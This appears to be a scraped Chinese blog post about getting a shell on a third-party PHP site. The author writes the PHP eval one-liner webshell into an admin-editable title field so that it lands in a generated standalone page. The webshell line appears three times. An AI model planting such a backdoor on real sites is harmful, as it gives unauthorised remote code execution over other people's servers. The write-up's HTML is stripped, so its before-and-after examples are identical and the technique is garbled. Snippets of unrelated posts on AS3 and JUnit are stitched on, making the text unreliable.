關於後台生成單獨頁面拿shell

2022-09-23 22:42:24 字數 557 閱讀 5000

今天群裡乙個鳥人丟個後台叫幫忙拿shell。一看是fck,就各種去弄了...結果無功而返,php語言。過程就不說了,不是重點.後來在前台開啟各種鏈結以及配合後台檢視發現他的關於我們\招賢納士只能的頁面是獨立的php頁面.這就好辦了。寫個一句話即可。至於怎麼寫,我這就扯下。

看**:

業務領域

標題標題2

內容內容 內容

內容      

這是他後台能夠控制的部分,可以看到,標題和內容都被放在乙個div裡面

就拿標題部分來說吧

標題 直接寫入一句話 將會變成

<?php @eval($_post['pass']);?>

這樣是不能執行成功的,我們要做的,僅僅只是加多一點**而已,說白了就是想辦法脫離這個和的控制。

比如我們把標題寫成

<?php @eval($_post['pass']);?>

這樣輸出結果就變成

<?php @eval($_post['pass']);?>

這樣就可以成功執行我們的**了.但是今天這個後台標題限制了字數,內容編輯器也被那貨搞壞了。就沒成功,只能寫

後台單獨生成php頁面拿shell及防範

今天群裡乙個鳥人丟個後台叫幫忙拿shell。一看是fck,就各種去弄了.結果無功而返,php語言。過程就不說了,不是重點.後來在前台開啟各種鏈結以及配合後台檢視發現他的關於我們 招賢納士只能的頁面是獨立的php頁面.這就好辦了。寫個一句話即可。至於怎麼寫,我這就扯下。看 業務領域 標題標題2 內容內...

AS3生成單獨「雙擊事件」

as3雖然提供了雙擊事件,但在觸發雙擊事件之前會觸發乙個單擊事件,這給編寫遊戲的朋友帶來了很多不便,於是還是自己再加入寫判斷來生成單一的事件,也就是有雙擊事件的時候就沒有單擊事件,有單擊事件的時候就沒有雙擊事件。如下 mc.doubleclickenabled true mc.addeventlis...

關於junit生成單元測報

前幾天專案中需要用junit生測試文件,到網上找了一下,現將方法貼出,與大家共享 專案不能引用到其他專案,如果引用到其他專案,需要把其他專案打成jar包,然後去引用jar包 建立乙個套件類,右擊套件類,點export 在general裡面點ant builders 構建檔案,如下圖所示 然後點nex...